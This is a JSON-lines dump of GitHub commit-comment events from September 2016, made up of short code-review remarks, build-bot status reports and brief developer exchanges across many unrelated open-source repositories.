{"id":"4600981684","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19126261,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T08:09:53Z","updated_at":"2016-09-22T08:09:53Z","body":"@pb00068 I don't think so. rbeta -1 to become -VALUE_INFINITE seems ok."}},"created_at":"2016-09-22T08:09:53Z"}
{"id":"4600983404","type":"CommitCommentEvent","actor":{"login":"cuongtv2004"},"repo":{"name":"cuongtv2004/Dockerfile"},"payload":{"comment":{"id":19126267,"position":null,"line":null,"path":null,"commit_id":"71f17fb165cf57bb1ec69bf20b76eb1fea7ff32c","created_at":"2016-09-22T08:10:18Z","updated_at":"2016-09-22T08:10:18Z","body":"Rails 4.2.6"}},"created_at":"2016-09-22T08:10:18Z"}
{"id":"4600985184","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19126269,"position":null,"line":null,"path":null,"commit_id":"55ac0186cc7b716a150f17daf755244cc58a6241","created_at":"2016-09-22T08:10:44Z","updated_at":"2016-09-22T08:10:44Z","body":"If you've re-run cmake and the error still persists, then please open an issue about it."}},"created_at":"2016-09-22T08:10:44Z"}
{"id":"4600987123","type":"CommitCommentEvent","actor":{"login":"bestony"},"repo":{"name":"bestony/LCTT-Helper"},"payload":{"comment":{"id":19126272,"position":null,"line":null,"path":null,"commit_id":"1db2c507001b609283ea4557a850b1a29c724b47","created_at":"2016-09-22T08:11:12Z","updated_at":"2016-09-22T08:11:12Z","body":"#1 已改写"}},"created_at":"2016-09-22T08:11:12Z"}
{"id":"4600987173","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126273,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/Factory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:11:13Z","updated_at":"2016-09-22T08:11:13Z","body":"this entity doesn't specific to the monitor package"}},"created_at":"2016-09-22T08:11:13Z"}
{"id":"4600987240","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/uhu-installer-ubk"},"payload":{"comment":{"id":19126274,"position":null,"line":null,"path":null,"commit_id":"7ee280a3accdfdf9d40da8ab8322bde8e6904582","created_at":"2016-09-22T08:11:15Z","updated_at":"2016-09-22T08:11:15Z","body":"Végre jónak tűnik a gyakorlatban is."}},"created_at":"2016-09-22T08:11:15Z"}
{"id":"4600988255","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126277,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/TypedFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:11:29Z","updated_at":"2016-09-22T08:11:29Z","body":"this entity doesn't specific to the monitor package"}},"created_at":"2016-09-22T08:11:29Z"}
{"id":"4600988435","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19126278,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T08:11:32Z","updated_at":"2016-09-22T08:11:32Z","body":"An experiment with a \"shell\" interface should work fine with artiq_run."}},"created_at":"2016-09-22T08:11:32Z"}
{"id":"4600989625","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19126280,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T08:11:49Z","updated_at":"2016-09-22T08:11:49Z","body":"@joergoster OK, I think it's worth to submit another test. Good Luck!"}},"created_at":"2016-09-22T08:11:49Z"}
{"id":"4600989655","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19126281,"position":5,"line":5,"path":"intro/11_different_elements.py","commit_id":"4a376bb933a249aee92749caeed80ed005a8f2ac","created_at":"2016-09-22T08:11:49Z","updated_at":"2016-09-22T08:11:49Z","body":"return to_list.sort() ?"}},"created_at":"2016-09-22T08:11:49Z"}
{"id":"4600989916","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126282,"position":27,"line":27,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/FsDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:11:53Z","updated_at":"2016-09-22T08:11:53Z","body":"invalid formatting"}},"created_at":"2016-09-22T08:11:53Z"}
{"id":"4600990744","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126285,"position":42,"line":42,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/FsDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:12:06Z","updated_at":"2016-09-22T08:12:06Z","body":"invalid formatting"}},"created_at":"2016-09-22T08:12:06Z"}
{"id":"4600991221","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126286,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-22T08:12:13Z","updated_at":"2016-09-22T08:12:13Z","body":"121784677-OAControllerFixes4633 (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2339 of 2341 tests passed, 567 test warnings)\n\n * 569 tests had: AUD diffs.\n * 11 tests had: RDD diffs.\n * 8 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR small diffs.\n * 4 tests had: Table small diffs.\n * 6 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T08:12:13Z"}
{"id":"4600991867","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126288,"position":28,"line":28,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/HttpDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:12:22Z","updated_at":"2016-09-22T08:12:22Z","body":"invalid formatting"}},"created_at":"2016-09-22T08:12:22Z"}
{"id":"4600993432","type":"CommitCommentEvent","actor":{"login":"shinchiro"},"repo":{"name":"shinchiro/shinchiro-encodes"},"payload":{"comment":{"id":19126291,"position":null,"line":null,"path":null,"commit_id":"835362bcc6e082efd422c21c4251252280a94269","created_at":"2016-09-22T08:12:44Z","updated_at":"2016-09-22T08:12:44Z","body":"I think the domain, minitheatre.org, expired yesterday\n\n>\n"}},"created_at":"2016-09-22T08:12:44Z"}
{"id":"4600993651","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19126292,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T08:12:47Z","updated_at":"2016-09-22T08:12:47Z","body":"Sure. That would be perfect."}},"created_at":"2016-09-22T08:12:47Z"}
{"id":"4600993791","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126293,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T08:12:49Z","updated_at":"2016-09-22T08:12:49Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1194 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-67.57%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.7%25-red.svg)</a>\n"}},"created_at":"2016-09-22T08:12:49Z"}
{"id":"4600995354","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126296,"position":63,"line":63,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/HttpDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:13:13Z","updated_at":"2016-09-22T08:13:13Z","body":"this is not protocol but API"}},"created_at":"2016-09-22T08:13:13Z"}
{"id":"4600997438","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126299,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T08:13:45Z","updated_at":"2016-09-22T08:13:45Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T08:13:45Z"}
{"id":"4600997916","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19126300,"position":1,"line":1,"path":"intro/11_different_elements.py","commit_id":"4a376bb933a249aee92749caeed80ed005a8f2ac","created_at":"2016-09-22T08:13:52Z","updated_at":"2016-09-22T08:13:52Z","body":"it would be better to use docstrings for documentation purposes:\r\n```python\r\n'''\r\nAddandSort takes elements from the |from_list| and adds them to |to_list|\r\n'''\r\ndef addAndSort(from_list, to_list):\r\n    ...\r\n\r\n```"}},"created_at":"2016-09-22T08:13:52Z"}
{"id":"4601001299","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19126308,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T08:14:44Z","updated_at":"2016-09-22T08:14:44Z","body":"@pb00068 Thanks, but I don't think running yet another test makes any sense. This condition will most likely never be triggered under fishtest adjudication rules. I will submit a pull request later this day."}},"created_at":"2016-09-22T08:14:44Z"}
{"id":"4601001495","type":"CommitCommentEvent","actor":{"login":"wisenmini"},"repo":{"name":"shinchiro/shinchiro-encodes"},"payload":{"comment":{"id":19126309,"position":null,"line":null,"path":null,"commit_id":"835362bcc6e082efd422c21c4251252280a94269","created_at":"2016-09-22T08:14:46Z","updated_at":"2016-09-22T08:14:46Z","body":"Any idea of ita future? Where are you going to host your listing?\n\nOn 22 Sep 2016 16:12, \"shinchiro\" <notifications@github.com> wrote:\n\n> I think the domain, minitheatre.org, expired yesterday\n>\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/shinchiro/shinchiro-encodes/commit/835362bcc6e082efd422c21c4251252280a94269#commitcomment-19126291>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVUxrCwwUCq5k6OOu3WENvwsvfe4c-fPks5qsjh8gaJpZM4KDd67>\n> .\n>\n"}},"created_at":"2016-09-22T08:14:46Z"}
{"id":"4601002174","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19126312,"position":1,"line":1,"path":"intro/11_different_elements.py","commit_id":"4a376bb933a249aee92749caeed80ed005a8f2ac","created_at":"2016-09-22T08:14:56Z","updated_at":"2016-09-22T08:14:56Z","body":"Function name is not PEP8-compatible. \r\nIt should be like addAndSort instead."}},"created_at":"2016-09-22T08:14:56Z"}
{"id":"4601002364","type":"CommitCommentEvent","actor":{"login":"Persephone"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19126313,"position":null,"line":null,"path":null,"commit_id":"55ac0186cc7b716a150f17daf755244cc58a6241","created_at":"2016-09-22T08:14:58Z","updated_at":"2016-09-22T08:14:58Z","body":"noob error here, i did that and now it works lol.. sorry!"}},"created_at":"2016-09-22T08:14:58Z"}
{"id":"4601003014","type":"CommitCommentEvent","actor":{"login":"pandafox"},"repo":{"name":"anyTV/anytv-kue"},"payload":{"comment":{"id":19126314,"position":22,"line":20,"path":"README.md","commit_id":"f280b3ff4ad55c17eb3b83e1294fd0848388c359","created_at":"2016-09-22T08:15:08Z","updated_at":"2016-09-22T08:15:08Z","body":"anytv-kue?"}},"created_at":"2016-09-22T08:15:08Z"}
{"id":"4601003027","type":"CommitCommentEvent","actor":{"login":"wittawatj"},"repo":{"name":"wittawatj/gatsby-bootcamp-2016"},"payload":{"comment":{"id":19126315,"position":null,"line":null,"path":null,"commit_id":"5455da5ab8a74c75e5b842a26447cf689b8c3b3c","created_at":"2016-09-22T08:15:08Z","updated_at":"2016-09-22T08:15:08Z","body":"This is nice. If the equations are too scary, we can give the students this simulator as well (without giving the true parameters). They can treat this as a black box that generates trajectories."}},"created_at":"2016-09-22T08:15:08Z"}
{"id":"4601004548","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19126321,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T08:15:30Z","updated_at":"2016-09-22T08:15:30Z","body":"@joergoster Yes, indeed this makes more sense.\r\n"}},"created_at":"2016-09-22T08:15:30Z"}
{"id":"4601006444","type":"CommitCommentEvent","actor":{"login":"Louiso"},"repo":{"name":"Louiso/HolaMundo2"},"payload":{"comment":{"id":19126327,"position":null,"line":null,"path":null,"commit_id":"9d3f63000e6ecb3a8c3be0ec3514aa0c701e7bbb","created_at":"2016-09-22T08:15:58Z","updated_at":"2016-09-22T08:15:58Z","body":"Pienso que no debiste ser tan duro con ese muchacho"}},"created_at":"2016-09-22T08:15:58Z"}
{"id":"4601006584","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19126328,"position":null,"line":null,"path":null,"commit_id":"55ac0186cc7b716a150f17daf755244cc58a6241","created_at":"2016-09-22T08:16:01Z","updated_at":"2016-09-22T08:16:01Z","body":"No worries. Any adding (or removing) of source files will require you to re-run cmake so it updates all the build references, otherwise you'll end up with errors like that."}},"created_at":"2016-09-22T08:16:01Z"}
{"id":"4601012641","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19126340,"position":14,"line":14,"path":"intro/11_different_elements.py","commit_id":"4a376bb933a249aee92749caeed80ed005a8f2ac","created_at":"2016-09-22T08:17:30Z","updated_at":"2016-09-22T08:17:30Z","body":"не экономь на спичках, а используй отдельный контейнер для хранения обработанных цифр,\r\nили попробуй вообще без него: \r\n```python\r\nresult = \" \".join(new_nums)\r\n```"}},"created_at":"2016-09-22T08:17:30Z"}
{"id":"4601013353","type":"CommitCommentEvent","actor":{"login":"pandafox"},"repo":{"name":"anyTV/anytv-kue"},"payload":{"comment":{"id":19126342,"position":135,"line":133,"path":"README.md","commit_id":"f280b3ff4ad55c17eb3b83e1294fd0848388c359","created_at":"2016-09-22T08:17:40Z","updated_at":"2016-09-22T08:17:40Z","body":"Should indicate if it is not specified, what's the default behaviour?"}},"created_at":"2016-09-22T08:17:40Z"}
{"id":"4601015774","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":19126347,"position":6,"line":34,"path":"Makefile","commit_id":"8810273010afd91b0586f57d9c5794e7dd617d10","created_at":"2016-09-22T08:18:16Z","updated_at":"2016-09-22T08:18:16Z","body":"@bin/coverage html"}},"created_at":"2016-09-22T08:18:16Z"}
{"id":"4601016625","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19126350,"position":null,"line":null,"path":null,"commit_id":"87ea06c98b4f302d057d314c30b2ea5c29110b59","created_at":"2016-09-22T08:18:28Z","updated_at":"2016-09-22T08:18:28Z","body":"Looks like I need to do a bit more in the cpp backend to support Rest.\r\n"}},"created_at":"2016-09-22T08:18:28Z"}
{"id":"4601016660","type":"CommitCommentEvent","actor":{"login":"wittawatj"},"repo":{"name":"wittawatj/gatsby-bootcamp-2016"},"payload":{"comment":{"id":19126351,"position":null,"line":null,"path":null,"commit_id":"5455da5ab8a74c75e5b842a26447cf689b8c3b3c","created_at":"2016-09-22T08:18:28Z","updated_at":"2016-09-22T08:18:28Z","body":"@jmagraner  But since this repo is public, everyone can see the true parameters anyway. :)"}},"created_at":"2016-09-22T08:18:28Z"}
{"id":"4601016953","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19126352,"position":225,"line":null,"path":"index.html","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-22T08:18:33Z","updated_at":"2016-09-22T08:18:33Z","body":"un-hacked"}},"created_at":"2016-09-22T08:18:33Z"}
{"id":"4601019202","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126358,"position":null,"line":null,"path":null,"commit_id":"c4a222b538420a10f05b14ef5d4f97c15b029210","created_at":"2016-09-22T08:19:07Z","updated_at":"2016-09-22T08:19:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1092](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13833&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T08:19:07Z"}
{"id":"4601020743","type":"CommitCommentEvent","actor":{"login":"pandafox"},"repo":{"name":"anyTV/anytv-kue"},"payload":{"comment":{"id":19126367,"position":10,"line":8,"path":"README.md","commit_id":"f280b3ff4ad55c17eb3b83e1294fd0848388c359","created_at":"2016-09-22T08:19:30Z","updated_at":"2016-09-22T08:19:30Z","body":"Perhaps we should use kue-scheduler to added support for scheduled jobs?\r\n\r\nhttps://github.com/anyTV/frnky/blob/master/api/helpers/queue.js"}},"created_at":"2016-09-22T08:19:30Z"}
{"id":"4601022246","type":"CommitCommentEvent","actor":{"login":"rojcyk"},"repo":{"name":"rojcyk/blueprint"},"payload":{"comment":{"id":19126369,"position":null,"line":null,"path":null,"commit_id":"2fe7a085a380b114207c44cc4cd083f6d67fe4b9","created_at":"2016-09-22T08:19:51Z","updated_at":"2016-09-22T08:19:51Z","body":"Thank you,\r\n\r\n@PeterEmil originally the template used a San Francisco font available in macOS. But later, I've changed it for a SFUI. The font available in macOS is NOT the same font which is used in iOS. Thus I would recommend downloading it at https://developer.apple.com/fonts/"}},"created_at":"2016-09-22T08:19:51Z"}
{"id":"4601026247","type":"CommitCommentEvent","actor":{"login":"PeterEmil"},"repo":{"name":"rojcyk/blueprint"},"payload":{"comment":{"id":19126376,"position":null,"line":null,"path":null,"commit_id":"2fe7a085a380b114207c44cc4cd083f6d67fe4b9","created_at":"2016-09-22T08:20:51Z","updated_at":"2016-09-22T08:20:51Z","body":"Will do that. Thanks!"}},"created_at":"2016-09-22T08:20:51Z"}
{"id":"4601028623","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19126381,"position":null,"line":null,"path":null,"commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-22T08:21:26Z","updated_at":"2016-09-22T08:21:26Z","body":"I'm not sure if it works or not yet"}},"created_at":"2016-09-22T08:21:26Z"}
{"id":"4601031360","type":"CommitCommentEvent","actor":{"login":"romilrobtsenkov"},"repo":{"name":"veebiprogrammeerimine-2016s/3.tund-III-ruhm"},"payload":{"comment":{"id":19126390,"position":null,"line":null,"path":null,"commit_id":"509a5bb774f3c585273fe372b226ce0e0c15622f","created_at":"2016-09-22T08:22:06Z","updated_at":"2016-09-22T08:22:06Z","body":"http://stackoverflow.com/a/35621375"}},"created_at":"2016-09-22T08:22:06Z"}
{"id":"4601035190","type":"CommitCommentEvent","actor":{"login":"sweitmann"},"repo":{"name":"ledger123/runmyaccounts"},"payload":{"comment":{"id":19126395,"position":null,"line":null,"path":null,"commit_id":"e83cf09cbea48c340b2420dc20ced1e1ff53c684","created_at":"2016-09-22T08:23:02Z","updated_at":"2016-09-22T08:23:02Z","body":"Hi Armaghan, \r\n\r\nI tested this by setting date format to yyyy-mm-dd and the closing the books by '2006112'. The system accepted the date without any error message and confirmed that:\r\n\r\n![bildschirmfoto vom 2016-09-22 10 10 13](https://cloud.githubusercontent.com/assets/100664/18740978/d6db6cbc-80ac-11e6-9250-f393d9bb2011.png)\r\n\r\nI then opened the books again and tried to make a general entry booking with the same date:\r\n\r\n![bildschirmfoto vom 2016-09-22 10 13 02](https://cloud.githubusercontent.com/assets/100664/18741066/6cc5e590-80ad-11e6-8f4e-e70a2b87e86e.png)\r\n\r\nAnd got the 'Error!' message with the following result in the apache log:\r\n\r\nERROR:  date/time field value out of range: \"2006113\"\r\nLINE 5:        transdate = '2006113',\r\n                           ^\r\nHINT:  Perhaps you need a different \"datestyle\" setting.\r\n\r\nIt seems to me as if the general entry booking date test is more precise than the audit control date test. Do you think we can make them the same, so that the audit control test also results in 'ERROR: date/time field value out of range:\" if 2006113 is entered in the 'Close Books up to' field?\r\n\r\nRegards"}},"created_at":"2016-09-22T08:23:02Z"}
{"id":"4601037490","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19126400,"position":7,"line":7,"path":"Ex One/style.css","commit_id":"e61e402b1ec83811fbec6f18dbc32e57fccba7a3","created_at":"2016-09-22T08:23:35Z","updated_at":"2016-09-22T08:23:35Z","body":"Use 2-space indentation at all times."}},"created_at":"2016-09-22T08:23:35Z"}
{"id":"4601037785","type":"CommitCommentEvent","actor":{"login":"GitHubGreens"},"repo":{"name":"GitHubGreens/test"},"payload":{"comment":{"id":19126402,"position":6,"line":5,"path":"src/cn/edu/bnuz/Test.java","commit_id":"a247927f16e29496ea3bf5c78f60417a4d5c79e8","created_at":"2016-09-22T08:23:39Z","updated_at":"2016-09-22T08:23:39Z","body":"odd!"}},"created_at":"2016-09-22T08:23:39Z"}
{"id":"4601039467","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19126425,"position":23,"line":23,"path":"Ex One/style.css","commit_id":"e61e402b1ec83811fbec6f18dbc32e57fccba7a3","created_at":"2016-09-22T08:24:04Z","updated_at":"2016-09-22T08:24:04Z","body":"Always remove unnecessary whitespaces"}},"created_at":"2016-09-22T08:24:04Z"}
{"id":"4601040425","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126442,"position":6,"line":11,"path":"2016-02/content/Raza.tex","commit_id":"d0525e483288f56650209ba7f1ab4086920d5b38","created_at":"2016-09-22T08:24:17Z","updated_at":"2016-09-22T08:24:17Z","body":"we can ask the author whether he wants to provide some biographical information or not.\r\nIf not you can `%\\def\\bioone ...` or `\\undef\\bioone%` so there wont be a footnote to the author’s name."}},"created_at":"2016-09-22T08:24:17Z"}
{"id":"4601042364","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126454,"position":null,"line":null,"path":null,"commit_id":"996be0d3f33286dc388c98a37000e0996fbda09e","created_at":"2016-09-22T08:24:43Z","updated_at":"2016-09-22T08:24:43Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-PullRequest.47+5](http://build.prxm.it:8813/viewLog.html?buildId=3672&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:42"}},"created_at":"2016-09-22T08:24:43Z"}
{"id":"4601042368","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126455,"position":null,"line":null,"path":null,"commit_id":"996be0d3f33286dc388c98a37000e0996fbda09e","created_at":"2016-09-22T08:24:43Z","updated_at":"2016-09-22T08:24:43Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-PullRequest.47+5](http://build.prxm.it:8813/viewLog.html?buildId=3672&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:42"}},"created_at":"2016-09-22T08:24:43Z"}
{"id":"4601044555","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19126462,"position":51,"line":51,"path":"Ex One/style.css","commit_id":"e61e402b1ec83811fbec6f18dbc32e57fccba7a3","created_at":"2016-09-22T08:25:13Z","updated_at":"2016-09-22T08:25:13Z","body":"It is advisable to always specify fallback fonts. Georgia belongs to the Serif family."}},"created_at":"2016-09-22T08:25:13Z"}
{"id":"4601047488","type":"CommitCommentEvent","actor":{"login":"Persephone"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19126469,"position":null,"line":null,"path":null,"commit_id":"55ac0186cc7b716a150f17daf755244cc58a6241","created_at":"2016-09-22T08:25:56Z","updated_at":"2016-09-22T08:25:56Z","body":"Thanks I will remember that :+1: "}},"created_at":"2016-09-22T08:25:56Z"}
{"id":"4601051668","type":"CommitCommentEvent","actor":{"login":"Z000000"},"repo":{"name":"Z000000/algorithm"},"payload":{"comment":{"id":19126477,"position":10,"line":10,"path":"mymintree.c","commit_id":"63aa8a2c725585fd0d6203c6c746af84c49fd271","created_at":"2016-09-22T08:26:53Z","updated_at":"2016-09-22T08:26:53Z","body":"heheh"}},"created_at":"2016-09-22T08:26:53Z"}
{"id":"4601052570","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19126481,"position":null,"line":null,"path":null,"commit_id":"b5819318f0a114b981b633f726993742a3b3cd04","created_at":"2016-09-22T08:27:06Z","updated_at":"2016-09-22T08:27:06Z","body":"Hmm.. there's something else not being in synch on the aarch64 builders.\r\nWhat is it? gnutls?"}},"created_at":"2016-09-22T08:27:06Z"}
{"id":"4601053215","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/CSSTrack"},"payload":{"comment":{"id":19126485,"position":10,"line":10,"path":"Ex One/index.html","commit_id":"e61e402b1ec83811fbec6f18dbc32e57fccba7a3","created_at":"2016-09-22T08:27:15Z","updated_at":"2016-09-22T08:27:15Z","body":"Don't use inline styles. All styles should go into a separate file."}},"created_at":"2016-09-22T08:27:15Z"}
{"id":"4601054380","type":"CommitCommentEvent","actor":{"login":"Z000000"},"repo":{"name":"Z000000/algorithm"},"payload":{"comment":{"id":19126488,"position":null,"line":null,"path":null,"commit_id":"63aa8a2c725585fd0d6203c6c746af84c49fd271","created_at":"2016-09-22T08:27:32Z","updated_at":"2016-09-22T08:27:32Z","body":"successful"}},"created_at":"2016-09-22T08:27:32Z"}
{"id":"4601055653","type":"CommitCommentEvent","actor":{"login":"cuongnguyen2503"},"repo":{"name":"phunghv/phunghv.github.io"},"payload":{"comment":{"id":19126492,"position":4,"line":4,"path":"_layouts/home.html","commit_id":"c8d2fd7424ec9f8c873bbc12aca7f33aa040f2c5","created_at":"2016-09-22T08:27:46Z","updated_at":"2016-09-22T08:27:46Z","body":"![lgtm2](https://cloud.githubusercontent.com/assets/9583215/16071335/fc69869e-3304-11e6-9f38-71fd0acc8965.gif)"}},"created_at":"2016-09-22T08:27:46Z"}
